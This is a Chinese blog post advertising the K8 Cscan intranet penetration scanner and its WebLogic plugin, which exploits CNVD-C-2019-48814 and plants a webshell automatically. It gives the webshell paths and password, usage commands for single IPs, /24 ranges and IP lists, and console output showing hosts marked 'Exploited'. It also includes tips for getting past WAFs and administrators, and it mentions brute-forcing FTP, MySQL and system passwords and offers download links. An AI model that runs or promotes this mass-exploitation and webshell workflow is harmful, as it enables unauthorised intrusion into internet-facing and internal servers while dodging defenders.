[原创]K8Cscan插件之Weblogic漏洞扫描&GetShell Exploit

[原创]K8 Cscan 大型内网渗透自定义扫描器

https://www.cnblogs.com/k8gege/p/10519321.html

Cscan简介:
何为自定义扫描器?其实也是插件化,但Cscan不需要编程同样可实现自定义功能,这比单纯插件化更容易实现插件功能
Cscan旨在为用户提供一个高度灵活、简单易用、多线程、多网段的插件化扫描框架,减少大量重复性工作提高工作效率
3.3及以上版本分为检测存活和不检测存活主机模式 程序采用多线程批量扫描大型内网IP段C段存活主机(支持上万个C段)
插件含C段旁注扫描、子域名扫描、Ftp密码爆破、Mysql密码爆、系统密码爆破、存活主机扫描、Web信息探测、端口扫描
支持调用任意外部程序或脚本,支持自定义模块,当然也可用于外网扫描(如子域名、C段旁注、FTP破、MYSQL爆破等)

WeblogicScan插件

K8Cscan Moudle WeblogicScan & Exploit
目前仅支持漏洞编号 CNVD-C-2019-48814
该版本为探测weblogic漏洞并自动GetShell
外网可当成EXP使用,也可内网自动渗透用
无论内外网均可批量(填写ip或ip段列表即可)

[原创]K8Cscan插件之Weblogic漏洞扫描&GetShell Exploit

用法:

K8cmdshell 向两个默认路径上传webshell 
使用飞刀cmd连接,经过Base64加密可过waf
传输CMD命令不加密,容易被WAF拦截或管理员发现

http://192.168.1.106:7001/_async/shell.jsp tom
http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom //http://192.168.1.106:7001/_async/shell.jsp tom //http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom 指定IP(当成EXP用,填写内网或外网IP即可) C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106 Cscan 3.5 By K8gege load netscan.dll 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited Finished! 指定C段 C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106/24 Cscan 3.5 By K8gege load netscan.dll Segment: 192.168.1.0 ============================================= 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited 192.168.1.1 192.168.1.105 192.168.1.108 192.168.1.100 ============================================= onlinePC:5 Finished! 指定IP列表同目录下ip.txt(示例扫描3个IP) C:\Users\K8team\Desktop\Cscan>Cscan20.exe Cscan 3.5 By K8gege load netscan.dll scan ip.txt (IP) ============================================= 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited 192.168.1.105 192.168.1.1 ============================================= onlinePC:3 Finished! 指定C段列表同目录下ipc.txt(示例扫描一个IP段) C:\Users\K8team\Desktop\Cscan>Cscan20.exe Cscan 3.5 By K8gege load netscan.dll scan ipc.txt (IP/24) Segment: 192.168.1.0 ============================================= 192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited 192.168.1.1 192.168.1.105 192.168.1.108 ============================================= onlinePC:4 Finished!

 

3、下载

WeblogicScan插件

 

主程序

https://github.com/k8gege/K8CScan

上一篇:使用kail中Metasploit获取Windows的权限-9.20


下一篇:渗透测试-基于白名单执行payload--Odbcconf